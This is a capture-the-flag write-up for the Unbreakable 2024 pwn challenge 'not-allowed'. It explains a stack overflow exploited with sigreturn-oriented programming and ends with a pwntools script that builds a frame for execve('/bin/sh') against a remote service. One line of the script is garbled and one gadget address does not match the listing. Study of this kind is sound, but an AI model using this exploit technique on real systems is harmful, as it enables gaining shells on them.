not-allowed [Unbreakable 2024]

pwn srop
writeup by: sunbather

Challenge Description

Silence speaks louder than words.


We receive a simple binary with two functions: main and wish. The main function sets up stream buffering with setvbufs and then does a call to fgets that is obviously overflowing the destination buffer.

void main(void)
  char local_28 [32];

Since the stack is NX, our remaining option is to ROP. Sadly we don’t have a lot of gadgets, but we do notice a few important ones when dumping with ROPgadget:

0x00000000004011ce : inc al ; ret
0x0000000000401156 : pop rdi ; ret
0x000000000040101a : ret
0x0000000000401162 : sub eax, eax ; ret
0x00000000004011cc : syscall

We have control over RAX, RDI and we also have a syscall gadget. Sadly however, the imported libc functions do not let us print anything! So we cannot leak libc and jump to system or execve. We can, however, do SROP! We can craft a signal return frame on the stack and then trigger it using a sigreturn syscall. But how do we get an address for /bin/sh? The wish function has everything prepared for us:

void wish(void)
  string[0] = 'H';
  string[1] = 'e';
  string[2] = 'r';
  string[3] = 'e';
  string[4] = ' ';
  string[5] = 'y';
  string[6] = 'o';
  string[7] = 'u';
  string[8] = ' ';
  string[9] = 'g';
  string[10] = 'o';
  string[11] = ':';
  string[12] = ' ';
  string[13] = '/';
  string[14] = 'b';
  string[15] = 'i';
  string[16] = 'n';
  string[17] = '/';
  string[18] = 's';
  string[19] = 'h';
  string[20] = '\0';

We simply need to get the address corresponding to string[13] and call this function before we use the sigreturn syscall. Binary is non-PIE so getting the addresses to all those gadgets and objects is trivial.


#!/usr/bin/env python3

from pwn import *

context.arch = "amd64"

#target = process("./not-allowed")
target = remote("", 31555)

wish_addr = 0x00401175
sh_addr = 0x40407d
syscall_gadget = 0x4011cc
inc_al_gadget = p64(0x00000000004011ce)
zero_rax = p64(0x0000000000401161)

# frame that will call execve(/bin/sh)
frame = SigreturnFrame()
frame.rax = 59 # syscall code for execve
frame.rdi = sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0 = syscall_gadget

# 1. call wish
# 2. zero out rax w/ sub eax, eax
# 3. increment RAX to 15 (sigreturn)
# 4. syscall sigreturn
# 5. ???
# 6. profit
payload = b"a" * 0x28 + p64(wish_addr) + zero_rax + inc_al_gadget * 15 + p64(syscall_gadget) + bytes(frame)
